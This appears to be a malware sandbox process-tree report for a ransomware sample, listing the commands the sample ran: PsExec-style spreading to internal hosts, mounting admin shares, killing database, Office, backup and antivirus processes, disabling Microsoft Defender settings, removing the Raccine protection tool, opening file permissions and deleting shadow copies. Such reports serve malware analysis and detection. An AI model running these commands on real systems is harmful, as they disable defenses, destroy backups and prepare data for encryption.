- - C:\Windows\TEMP\uwtg55hs.exe
    "C:\Windows\TEMP\uwtg55hs.exe" \\10.10.0.27 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:6808
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\C$
    3⤵
    PID:6304
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    PID:5128
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\D$
    3⤵
    PID:5160
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\E$
    3⤵
    PID:7144
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    PID:6496
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\F$
    3⤵
    PID:7096
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\Users
    3⤵
    PID:1708
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\G$
    3⤵
    PID:6568
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /F
    3⤵
    PID:4968
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\A$
    3⤵
    PID:6848
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\H$
    3⤵
    PID:280
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\B$
    3⤵
    PID:6612
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\I$
    3⤵
    PID:5756
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqbcoreservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:6884
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\J$
    3⤵
    PID:6764
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\C$
    3⤵
    PID:5464
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM firefoxconfig.exe /F
    3⤵
    PID:3120
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\K$
    3⤵
    PID:1292
- - C:\Windows\TEMP\uwtg55hs.exe
    "C:\Windows\TEMP\uwtg55hs.exe" \\10.10.0.16 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:5228
- - C:\Windows\TEMP\uwtg55hs.exe
    "C:\Windows\TEMP\uwtg55hs.exe" \\10.10.0.30 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:5760
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\D$
    3⤵
    PID:6976
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM agntsvc.exe /F
    3⤵
    PID:424
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\E$
    3⤵
    PID:3408
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\L$
    3⤵
    PID:4132
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\M$
    3⤵
    PID:256
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\F$
    3⤵
    PID:5528
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat.exe /F
    3⤵
    PID:6212
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\N$
    3⤵
    PID:3820
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\G$
    3⤵
    PID:4820
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\O$
    3⤵
    PID:6000
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM steam.exe /F
    3⤵
    PID:4572
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\H$
    3⤵
    PID:5356
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\P$
    3⤵
    PID:6952
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\I$
    3⤵
    PID:5968
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\Q$
    3⤵
    PID:1044
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\R$
    3⤵
    PID:6536
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\J$
    3⤵
    PID:6112
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM encsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:6940
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\K$
    3⤵
    PID:3044
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\S$
    3⤵
    PID:2604
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM excel.exe /F
    3⤵
    - Kills process with taskkill
    PID:1176
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\L$
    3⤵
    PID:5096
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\T$
    3⤵
    PID:6476
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\M$
    3⤵
    PID:4972
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\U$
    3⤵
    PID:4520
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM CNTAoSMgr.exe /F
    3⤵
    PID:1172
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\N$
    3⤵
    PID:1524
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\V$
    3⤵
    PID:404
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\O$
    3⤵
    PID:5056
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlwriter.exe /F
    3⤵
    - Kills process with taskkill
    PID:7164
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\W$
    3⤵
    PID:252
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\P$
    3⤵
    PID:6608
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\X$
    3⤵
    PID:2692
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\Q$
    3⤵
    PID:1692
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\Y$
    3⤵
    PID:4168
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tbirdconfig.exe /F
    3⤵
    PID:6132
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\R$
    3⤵
    PID:5744
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\S$
    3⤵
    PID:6516
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\Z$
    3⤵
    PID:4396
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbeng50.exe /F
    3⤵
    PID:4156
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\T$
    3⤵
    PID:5140
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\U$
    3⤵
    PID:4100
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat64.exe /F
    3⤵
    - Kills process with taskkill
    PID:5508
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\V$
    3⤵
    PID:4296
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\W$
    3⤵
    PID:5808
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocomm.exe /F
    3⤵
    PID:5624
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\X$
    3⤵
    PID:7148
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\Y$
    3⤵
    PID:1408
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM infopath.exe /F
    3⤵
    - Kills process with taskkill
    PID:5332
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\Z$
    3⤵
    PID:6700
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.11\Users
    3⤵
    PID:4712
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mbamtray.exe /F
    3⤵
    PID:6628
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM zoolz.exe /F
    3⤵
    - Kills process with taskkill
    PID:6968
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" IM thunderbird.exe /F
    3⤵
    - Kills process with taskkill
    PID:6124
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbsnmp.exe /F
    3⤵
    - Kills process with taskkill
    PID:4532
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM xfssvccon.exe /F
    3⤵
    PID:4224
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    PID:1716
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
    PID:1744
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM isqlplussvc.exe /F
    3⤵
    PID:5284
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-opt.exe /F
    3⤵
    PID:4824
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM onenote.exe /F
    3⤵
    PID:1680
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocautoupds.exe /F
    3⤵
    PID:6224
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocssd.exe /F
    3⤵
    - Kills process with taskkill
    PID:6184
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM PccNTMon.exe /F
    3⤵
    - Kills process with taskkill
    PID:5376
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM oracle.exe /F
    3⤵
    - Kills process with taskkill
    PID:5396
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msaccess.exe /F
    3⤵
    - Kills process with taskkill
    PID:4808
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlagent.exe /F
    3⤵
    PID:6904
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM outlook.exe /F
    3⤵
    PID:6484
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlbrowser.exe /F
    3⤵
    - Kills process with taskkill
    PID:6060
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tmlisten.exe /F
    3⤵
    PID:6456
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlservr.exe /F
    3⤵
    - Kills process with taskkill
    PID:6064
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msftesql.exe /F
    3⤵
    PID:6908
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM powerpnt.exe /F
    3⤵
    - Kills process with taskkill
    PID:5544
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4304
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:1288
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.15\Users
    3⤵
    PID:6264
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM visio.exe /F
    3⤵
    PID:4480
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:6496
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM winword.exe /F
    3⤵
    - Kills process with taskkill
    PID:7144
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-nt.exe /F
    3⤵
    - Kills process with taskkill
    PID:6924
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM wordpad.exe /F
    3⤵
    PID:4388
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
    3⤵
    PID:6952
- - C:\Windows\system32\icacls.exe
    "icacls" "C:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5968
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.18\Users
    3⤵
    PID:7100
- - C:\Windows\system32\icacls.exe
    "icacls" "D:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:2388
- - C:\Windows\system32\icacls.exe
    "icacls" "Z:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6428
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.21\Users
    3⤵
    PID:4196
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.24\Users
    3⤵
    PID:2104
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.27\Users
    3⤵
    PID:4560
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.30\Users
    3⤵
    PID:1684

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start Dnscache /y
1⤵
PID:4236
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop macmnsvc /y
  2⤵
  PID:3484

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop bedbg /y
1⤵
PID:5484

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub
1⤵
PID:4844

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost
1⤵
PID:5448

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
1⤵
PID:5808

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
1⤵
PID:6504

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
1⤵
PID:4668

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
1⤵
PID:4580

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
1⤵
PID:4436

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
1⤵
PID:1328

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:4212

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
1⤵
PID:4328

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
1⤵
PID:6216

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
1⤵
PID:4468

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop audioendpointbuilder /y
1⤵
PID:5044

C:\Windows\PAExec-4840-RJMQBVDN.exe
C:\Windows\PAExec-4840-RJMQBVDN.exe -service
1⤵
PID:5668
- C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
  "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
  2⤵
  PID:764
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
    3⤵
    PID:4236
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Get-MpPreference -verbose
    3⤵
    PID:2684
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
    3⤵
    PID:1328
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
    3⤵
    PID:1376
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
    3⤵
    PID:4136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
    3⤵
    PID:832
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
    3⤵
    PID:4668
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
    3⤵
    PID:5300
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
    3⤵
    PID:4520
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
    3⤵
    PID:5508
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
    3⤵
    PID:6136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
    3⤵
    PID:6152
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
    3⤵
    PID:5720
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    PID:5152
- - C:\Windows\system32\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    PID:3184
- - C:\Windows\system32\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:7024
- - C:\Windows\system32\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:5268
- - C:\Windows\system32\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:7116
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:6832
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:6204
- - C:\Windows\system32\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:1292
- - C:\Windows\system32\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:6324
- - C:\Windows\system32\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:6064
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:4960
- - C:\Windows\system32\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:5428
- - C:\Windows\system32\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    PID:6096
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:5504
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:924
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    PID:2948
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    PID:1152
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    PID:6080
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
    - Kills process with taskkill
    PID:5312
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    PID:5128
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqbcoreservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:6184
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM isqlplussvc.exe /F
    3⤵
    PID:3820
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM agntsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:6976
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM PccNTMon.exe /F
    3⤵
    PID:2696
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /F
    3⤵
    PID:7132
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM firefoxconfig.exe /F
    3⤵
    PID:4864
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM onenote.exe /F
    3⤵
    PID:4552
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat.exe /F
    3⤵
    PID:4120
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msaccess.exe /F
    3⤵
    PID:4492
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM steam.exe /F
    3⤵
    PID:2948
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlwriter.exe /F
    3⤵
    PID:4548
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM outlook.exe /F
    3⤵
    - Kills process with taskkill
    PID:2208
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocomm.exe /F
    3⤵
    PID:1172
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:7056
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM encsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:6804
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tbirdconfig.exe /F
    3⤵
    - Kills process with taskkill
    PID:7136
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tmlisten.exe /F
    3⤵
    - Kills process with taskkill
    PID:6464
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:4396
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM infopath.exe /F
    3⤵
    - Kills process with taskkill
    PID:5608
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM visio.exe /F
    3⤵
    PID:4176
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM excel.exe /F
    3⤵
    - Kills process with taskkill
    PID:5524
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbeng50.exe /F
    3⤵
    - Kills process with taskkill
    PID:5636
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msftesql.exe /F
    3⤵
    - Kills process with taskkill
    PID:3312
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" IM thunderbird.exe /F
    3⤵
    PID:4228
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mbamtray.exe /F
    3⤵
    PID:5972
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbsnmp.exe /F
    3⤵
    PID:4596
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    PID:4960
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM CNTAoSMgr.exe /F
    3⤵
    - Kills process with taskkill
    PID:6752
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat64.exe /F
    3⤵
    - Kills process with taskkill
    PID:6084
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM powerpnt.exe /F
    3⤵
    PID:2340
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM zoolz.exe /F
    3⤵
    PID:4388
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM xfssvccon.exe /F
    3⤵
    PID:5212
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM winword.exe /F
    3⤵
    - Kills process with taskkill
    PID:6784
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-nt.exe /F
    3⤵
    - Kills process with taskkill
    PID:1832
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlservr.exe /F
    3⤵
    - Kills process with taskkill
    PID:6816
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM wordpad.exe /F
    3⤵
    PID:4884
- - C:\Windows\system32\arp.exe
    "arp" -a
    3⤵
    PID:1044
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-opt.exe /F
    3⤵
    PID:4464
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocautoupds.exe /F
    3⤵
    PID:7088
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocssd.exe /F
    3⤵
    - Kills process with taskkill
    PID:4820
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM oracle.exe /F
    3⤵
    PID:6760
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlagent.exe /F
    3⤵
    PID:5744
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlbrowser.exe /F
    3⤵
    - Kills process with taskkill
    PID:4972
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqld.exe /f
    3⤵
    - Kills process with taskkill
    PID:6832
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysql.exe /f
    3⤵
    PID:184
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM rphost.exe /f
    3⤵
    PID:6944
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM rmngr.exe /f
    3⤵
    - Kills process with taskkill
    PID:4552
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ragent.exe /f
    3⤵
    - Kills process with taskkill
    PID:4492
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /f
    3⤵
    PID:6884
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM oracle.exe /f
    3⤵
    PID:5512
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM 1cv8.exe /f
    3⤵
    PID:7028
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM vmwp.exe /f
    3⤵
    PID:6312
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sql.exe /f
    3⤵
    - Kills process with taskkill
    PID:2544
- - C:\Windows\system32\icacls.exe
    "icacls" "Z:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4716
- - C:\Windows\system32\icacls.exe
    "icacls" "D:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:812
- - C:\Windows\system32\icacls.exe
    "icacls" "C:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:3040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
    3⤵
    PID:6220

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
PID:4328
- C:\Windows\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
  "714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
  2⤵
  PID:5380
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    - Kills process with taskkill
    PID:6084
- - C:\Windows\SysWOW64\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:6120
- - C:\Windows\SysWOW64\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:6400
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:628
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:4556
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:6812
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:5428
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:5164
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:3920
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:4132
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    PID:4960
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:6060
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    PID:5760
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    PID:6940
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    PID:3552
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    PID:6996
